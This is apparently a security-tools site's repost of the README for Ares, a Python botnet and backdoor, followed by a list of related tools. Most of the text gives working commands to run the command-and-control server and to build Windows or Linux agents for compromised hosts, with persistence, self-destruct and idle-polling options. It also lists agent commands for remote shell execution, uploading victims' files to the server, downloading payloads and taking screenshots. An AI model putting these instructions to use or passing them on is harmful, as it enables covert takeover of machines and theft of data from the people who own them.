Ares - Python Botnet and Backdoor

Ares is a Python-based remote access tool.

It is made of two main programs:

• A Command and Control server, which is a Web interface to administer the agents
• An agent program, which is run on the compromised host, and ensures communication with the CNC
• The Web interface can be run on any server running Python. The agent can be compiled to native executables using pyinstaller.

Setup

Install the Python requirements:

pip install -r requirements.txt

Initialize the database:

cd server
./ares.py initdb

In order to compile Windows agents on Linux, setup wine (optional):

./wine_setup.sh

Server

Run with the builtin (debug) server:

./ares.py runserver -h 0.0.0.0 -p 8080 --threaded

Or run using gunicorn:

gunicorn ares:app -b 0.0.0.0:8080 --threads 20

The server should now be accessible on http://localhost:8080

Agent

Run the Python agent (update config.py to suit your needs):

cd agent
./agent.py

Build a new agent to a standalone binary:

./builder.py -p Linux --server http://localhost:8080 -o agent
./agent

To see a list of supported options, run ./builder.py -h

./agent/builder.py -h
usage: builder.py [-h] -p PLATFORM --server SERVER -o OUTPUT
                  [--hello-interval HELLO_INTERVAL] [--idle_time IDLE_TIME]
                  [--max_failed_connections MAX_FAILED_CONNECTIONS]
                  [--persistent]

Builds an Ares agent.

optional arguments:
  -h, --help            show this help message and exit
  -p PLATFORM, --platform PLATFORM
                        Target platform (Windows, Linux).
  --server SERVER       Address of the CnC server (e.g http://localhost:8080).
  -o OUTPUT, --output OUTPUT
                        Output file name.
  --hello-interval HELLO_INTERVAL
                        Delay (in seconds) between each request to the CnC.
  --idle_time IDLE_TIME
                        Inactivity time (in seconds) after which to go idle.
                        In idle mode, the agent pulls commands less often
                        (every <hello_interval> seconds).
  --max_failed_connections MAX_FAILED_CONNECTIONS
                        The agent will self destruct if no contact with the
                        CnC can be made <max_failed_connections> times in a
                        row.
  --persistent          Automatically install the agent on first run.

Supported agent commands:

<any shell command>
Executes the command in a shell and return its output.

upload <local_file>
Uploads <local_file> to server.

download <url> <destination>
Downloads a file through HTTP(S).

zip <archive_name> <folder>
Creates a zip archive of the folder.

screenshot
Takes a screenshot.

python <command|file>
Runs a Python command or local file.

persist
Installs the agent.

clean
Uninstalls the agent.

exit
Kills the agent.

help
This help.

Download Ares

You might also like:

• Brakeman - A Static Analysis Security Vulnerability Scanner For Ruby on Rails Applications
• Vega - Web Application Security Scanner
• Nessus - An Advanced Vulnerability Scanner
• Resolver - A Reverse DNS Lookup Tool
• Arachni - Web Application Security Scanner Framework
• Sanewall - A Firewall Builder For Linux
• Santoku - A Linux Distro For Mobile Security, Malware Analysis, and Forensics
• SpiderFoot - An Open Source Intelligence Automation Tool
• PacketFence - An Open Source Network Access Control System
• Suricata - An Open Source IDS / IPS / NSM engine
• Malwasm - Tool For Malware Reverse Engineers
• Nishang - PowerShell For Penetration Testing and Offensive Security
• pWeb Suite - Web Application Penetration Testing Toolkit
• OWASP Bricks - Web Application Security Learning Platform
• WebVulScan - Web Application Vulnerability Scanner
• Zarp - Network Attack Tool
• bWAPP - An Extremely Buggy Web App For Practising Hacking
• HconSTF - An Open Source Security Assessment Toolkit